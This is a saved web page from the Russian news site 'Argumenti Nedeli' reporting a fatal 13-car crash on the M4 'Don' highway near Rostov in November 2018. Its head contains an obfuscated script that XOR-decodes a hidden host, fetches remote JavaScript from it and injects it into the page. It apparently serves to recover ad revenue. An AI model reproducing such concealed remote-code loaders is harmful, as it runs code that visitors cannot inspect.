<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name="yandex-verification" content="4c7141e5dab59132" />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">

		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>Массовое ДТП произошло  на трассе М4 &quot;Дон&quot; под Ростовом - Аргументы Недели</title><meta name="description" content="Массовое дорожно-транспортное происшествие произошло во вторник, 13 ноября, в Ростовской области. На 1070-м километре трассы М4 "Дон" столкнулись 13 автомобилей. В результате ДТП один человек погиб."><meta name="twitter:title" content="Массовое ДТП произошло  на трассе М4 "Дон" под Ростовом - Аргументы Недели"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/592347.jpeg"><meta name="og:title" content="Массовое ДТП произошло  на трассе М4 "Дон" под Ростовом - Аргументы Недели"><meta name="og:description" content="Массовое дорожно-транспортное происшествие произошло во вторник, 13 ноября, в Ростовской области. На 1070-м километре трассы М4 "Дон" столкнулись 13 автомобилей. В результате ДТП один человек погиб."><meta name="og:image" content="http://argumenti.ru/images/arhnews/592347.jpeg"><meta name="mediator_published_time" content="2018-11-13T22:19:42+0000"><meta name="mediator_theme" content="дтп"><meta name="mediator_theme" content="ростовская область"><meta name="mediator" content="592347"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=129" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/592347.jpeg" >	<//base href="http://argumenti.ru/" />
			<link rel="amphtml" href="http://argumenti.ru/society/2018/11/592347/amp">
		
		
	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/ico" href="http://argumenti.ru/favicon.ico" />
	<link rel="icon" type="image/png" href="http://argumenti.ru/favicon.png">
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />
	<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=7"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
 	<script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script>
    <script async src="https://yastatic.net/pcode/adfox/header-bidding.js"></script>
    <script>

const adfoxBiddersMap = {

'criteo': '717767',

'myTarget': '763128',

'betweenDigital': '793538',

'rtbhouse': '793538'

};

var adUnits = [

{

code: 'adfox_side11',

sizes: [[240, 400]],

bids: [

{

bidder: 'criteo',

params: {placementId: 1354898}

},

{

bidder: 'myTarget',

params: {placementId: 330419}

},

{

bidder: 'betweenDigital',

params: {placementId: 2743805}

},

{

bidder: 'rtbhouse',

params: {placementId:'iqFb2HUh6UMSdilEPxd5'}

}

]

},

{

code: 'adfox_mid1',

sizes: [[300, 250]],

bids: [

{

bidder: 'criteo',

params: {placementId: 1354894}

},

{

bidder: 'myTarget',

params: {placementId: 328619}

},

{

bidder: 'betweenDigital',

params: {placementId: 2743806}

},

{

bidder: 'rtbhouse',

params: {placementId:'AlMeBtEuvwVY6qdIdpob'}

}

]

},

{

code: 'adfox_mid2',

sizes: [[300, 250]],

bids: [

{

bidder: 'criteo',

params: {placementId: 1354895}

},

{

bidder: 'myTarget',

params: {placementId: 328621}

},

{

bidder: 'betweenDigital',

params: {placementId: 2743807}

},

{

bidder: 'rtbhouse',

params: {placementId:'TzZD21y1HoFWZkXwyLDX'}

}

]

},

];

var userTimeout = 1200;

window.YaHeaderBiddingSettings = {

biddersMap: adfoxBiddersMap,

adUnits: adUnits,

timeout: userTimeout

};

</script><!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
    <script type="text/javascript">
    // Tue Nov 13 2018 23:59:41 GMT+0300 (Moscow Standard Time)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('10149', 300, 'Z3t7f3w1ICBrZmF7fHp/YWplamwhfXo=', 'wqr7nq83a/fhup0lr8s/sak411b/7ygtc568afof/s8ebq5whgif7/n2j6pv753gr/vlo3vlcorxl/d9k6fd8/ty1dwigll6y');
</script>
<script id="cc-support-script" data-config="10149" data-base="Z3t7f3w1ICBrZmF7fHp/YWplamwhfXo=" type="text/javascript" src="https://dintsupnejec.ru/wqr7nq83a/fhup0lr8s/sak411b/7ygtc568afof/s8ebq5whgif7/n2j6pv753gr/vlo3vlcorxl/d9k6fd8/ty1dwigll6y"></script>
	</head>

			<body>
	
<!-- create page: 00:11:34 11.14.18 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<header>

<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li class="mob_hidden"><a href="http://argumenti.ru/">Главная страница</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/charity">Сможем вместе</a></li>
		<li class="mob_hidden"><a href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/allbooks" target="_blank" rel="nofollow">Книги pdf</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/complanes">Книга жалоб</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/udobreniya">Биоклад</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/opinion">Мнение</a></li>
		<li class="mob_hidden up_bars"><i class="fa fa-bars" aria-hidden="true"></i></li>
		<div class="dropmenu">
		<ul>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li style="border-bottom: none!important;"><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li class="drop_sub">Регионы</li>
			<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
			<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
			<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>		</ul>
		</div>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
		<li><a href="http://argumenti.ru">Главная</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/news">Все новости</a></li>
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
	<div id="star">
			<ul>
																								<li id="82760">
																<a href="http://argumenti.ru/world/2018/11/592251?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/c63906dc9f48bb082d7ad9c6c91c0008.jpg" width="160" height="110" alt="В ДНР рассказали о запрещенных военных методах противостоящих республике ВСУ" />
																					<p>В ДНР рассказали о запрещенных военных методах противостоящих республике ВСУ</p></a>	
						</li>

																								<li id="82773" >
																								<a href="http://argumenti.ru/world/2018/11/592282?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/6167a9a4314027f74a0766e2c45e2938.jpg" width="160" height="110" alt="Посол США при ЕС: Вашингтон ждет от Европы новых санкций против России" />
																<p>Посол США при ЕС: Вашингтон ждет от Европы новых санкций против России</p></a>
								
						</li>
																									<li id="82767">
																<a href="http://argumenti.ru/society/2018/11/592272?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/9df8508a8130b3e586ea8b74f764768e.jpeg" width="160" height="110" alt="Синоптики сообщили, когда в Москве образуется снежный покров" />
																					<p>Синоптики сообщили, когда в Москве образуется снежный покров</p></a>	
						</li>

												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

																<a href="http://argumenti.ru/an"><div class="newnum2"></div></a>
							


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg mob_hidden">

            
				<div id="social_top">
					<!--<a href="https://t.me/argumentiru" target="_blank"><i class="fa fa-telegram" aria-hidden="true"></i></a>-->
					<a href="https://vk.com/club14409962" target="_blank"><i class="fa fa-vk" aria-hidden="true"></i></a>
					<a href="https://ok.ru/argumenti" target="_blank"><i class="fa fa-odnoklassniki" aria-hidden="true"></i></a>
					<a href="https://www.facebook.com/argumentinedeli" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a>
					<a href="https://twitter.com/argumenti" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>
					<a href="https://www.instagram.com/argumenti.ru/" target="_blank"><i class="fa fa-instagram" aria-hidden="true"></i></a>

				</div>	


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kuban">Кубань</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport">Спорт</a></li>
			<li><a href="http://argumenti.ru/lifestyle">Лайфстайл</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>

					<div id="left">
		
			<!--AdFox START-->
<!--MarTi-->
<!--Площадка: argumenti.ru / * / *-->
<!--Тип баннера: Side-->
<!--Расположение: 1-->
<div id="adfox_side11"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 254948,
        containerId: 'adfox_side11',
        params: {
            pp: 'noj',
            ps: 'dadz',
            p2: 'fvyf',
            puid1: ''
        }
    });
</script>	
	<div id="titules" style="margin-bottom: 4px;">
		
	<a href="http://argumenti.ru/an">

	<img src="http://argumenti.ru/images/preview/price/383aaaba9574b441e981e403ba7ba3f4.jpg" alt="Аргументы Недели. 44(637) от 8.11.18">		
	</a>

		
	</div>

	<!-- подменю -->
	<ul id="corpmenu">
		<li><a href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li><a href="http://www.argumenti.ru/reklama/internet.html">Реклама в «АН»</a></li>
		<li><a href="http://argumenti.ru/subscript">Подписка на газету</a></li>
	
	</ul>


	<script language="JavaScript" type="text/javascript">
		function NewRegion() {
			region_url = $('#Regions option:selected').val();
			if (region_url !='')
				window.location = region_url;
		}
	</script>
	<!--Тимошенко-->
	
	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: Ротация 1-->
<!--Расположение: <верх страницы>-->
<div id="adfox_154045834388141416"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_154045834388141416',
        params: {
            pp: 'g',
            ps: 'cquo',
            p2: 'gdnt'
        }
    });
</script>
	<!--опросы-->
		
		

	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: Ротация 2-->
<!--Расположение: <верх страницы>-->
<div id="adfox_15404811830214585"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_15404811830214585',
        params: {
            pp: 'g',
            ps: 'cquo',
            p2: 'gdoi'
        }
    });
</script>	<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center>
        <a href="https://24smi.info/?utm_source=informer_2695" rel="nofollow">
            Агрегатор новостей 24СМИ
        </a>
    </center>
</div>

<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/b/2695.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
	
	
<div id="unit_83036"><a href="http://smi2.net/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//news.smi2.ru/data/js/83036.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>				
	
	<!--попновости-->	
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2018/11/592346">
					<img src="http://argumenti.ru/images/preview/arhnews/e1e0e80ddea03001aa1e5774ae1fe7ae.jpg" alt="Андрей Разин показал редкое фото Пугачевой и Моисеева из своего архива" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/11/592346" style="font-size:1.05em;">Андрей Разин показал редкое фото Пугачевой и Моисеева из своего архива</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/11/592336">
					<img src="http://argumenti.ru/images/preview/arhnews/5a6331434a092dace5440ac77f574ffa.jpg" alt="Анатолий Белый благодарен за все, чему его научила Марина Голуб" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/11/592336" style="font-size:1.05em;">Анатолий Белый благодарен за все, чему его научила Марина Голуб</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/11/592332">
					<img src="http://argumenti.ru/images/preview/arhnews/e533f091bb01cbf10162dad678218c63.jpg" alt="В сети обсуждают фигуру певицы Нюши: быстро в форму пришла, как будто не рожала" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/11/592332" style="font-size:1.05em;">В сети обсуждают фигуру певицы Нюши: быстро в форму пришла, как будто не рожала</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/11/592309">
					<img src="http://argumenti.ru/images/preview/arhnews/0ec969735a4ccbb39446464a518fffa9.jpg" alt="Ксения Стриж: мою личную жизнь изменил &quot;квартирный вопрос&quot;" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/11/592309" style="font-size:1.05em;">Ксения Стриж: мою личную жизнь изменил &quot;квартирный вопрос&quot;</a>
		</li>
	</ul>
	<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/69542" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/4311e80978329086dec12fe65637a477.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Помидоры: посадка и уход</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/80427" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/113300d0dd33a120643434787da27c47.jpeg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Выращиваем огурцы</div></a></li>	
					</ul>
	
	<div id="block__fix-adv">
		<!-- Yandex.RTB R-A-50615-2 -->
<div id="yandex_rtb_R-A-50615-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-2",
                renderTo: "yandex_rtb_R-A-50615-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>		
	</div>

</div>			
		<section id="center">

			<h2 class="namerub"><span class="rem">//</span>самое читаемое</h2>


<article class="rub_columns best_read" style="margin-top: 0px; width:100%;">
                            <div class="topnewsclicks">
            <a href="http://argumenti.ru/world/2018/11/592159?utm_source=argumenti.ru&utm_medium=news&utm_campaign=best">
            <div><span>1</span><p>Стали известны признаки &laquo;краха&raquo; воюющих против ополченцев республик Донбасса ВСУ</p></div>
            </a>
        </div>  
                      <div class="topnewsclicks">
            <a href="http://argumenti.ru/economics/2018/11/592201?utm_source=argumenti.ru&utm_medium=news&utm_campaign=best">
            <div><span>2</span><p>Назван способ нанести катастрофический удар по экономике враждебной РФ Украины</p></div>
            </a>
        </div>  
                      <div class="topnewsclicks">
            <a href="http://argumenti.ru/world/2018/11/592315?utm_source=argumenti.ru&utm_medium=news&utm_campaign=best">
            <div><span>3</span><p>В ДНР поведали об отказе ВСУ выполнять план Киева по срыву выборов в Донбассе</p></div>
            </a>
        </div>  
                      <div class="topnewsclicks">
            <a href="http://argumenti.ru/world/2018/11/592281?utm_source=argumenti.ru&utm_medium=news&utm_campaign=best">
            <div><span>4</span><p>Киев назвал гаранта возвращения сражающегося с Украиной Донбасса в состав страны</p></div>
            </a>
        </div>  
                      <div class="topnewsclicks">
            <a href="http://argumenti.ru/world/2018/11/591115?utm_source=argumenti.ru&utm_medium=news&utm_campaign=best">
            <div><span>5</span><p>Предсказаны опасные для Киева результаты выполнения соглашений о мире в Донбассе</p></div>
            </a>
        </div>  
   
</article>			
	
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/society">Общество</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>Массовое ДТП произошло  на трассе М4 &quot;Дон&quot; под Ростовом</h1>
	
				<p class="info">
					<span class="number_info">

						
						

													13&nbsp;ноября&nbsp;2018,&nbsp;22:19																			[&nbsp;«Аргументы Недели»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/815abc15ca9bcdfe6c9b33364f298084.jpeg" alt="Массовое ДТП произошло  на трассе М4 &quot;Дон&quot; под Ростовом" />
																									<figcaption>фото с сайта МЧС</figcaption>
															</figure>
																
																	
																								
						<div class="js-mediator-article" style="display: inline-block;"><p><strong>Массовое дорожно-транспортное происшествие произошло во вторник, 13 ноября, в Ростовской области. На 1070-м километре трассы М4 "Дон" столкнулись 13 автомобилей. В результате ДТП один человек погиб, и один человек пострадал.</strong></p>
<p>12 ноября в Ростовской области похолодало и выпал первый снег. Из-за непогоды в центре Ростова скопились гигантские пробки. По данным ГИБДД, из-за снегопада образовался затор с 1002-го по 1015-й километр трассы "Дон". К утру ограничения движения сняли на этом участке, но ввели для пассажирского транспорта на двух участках региональных дорог. Cнегопад в регионе продолжается, - сообщает РИА Новости.&nbsp;</p>
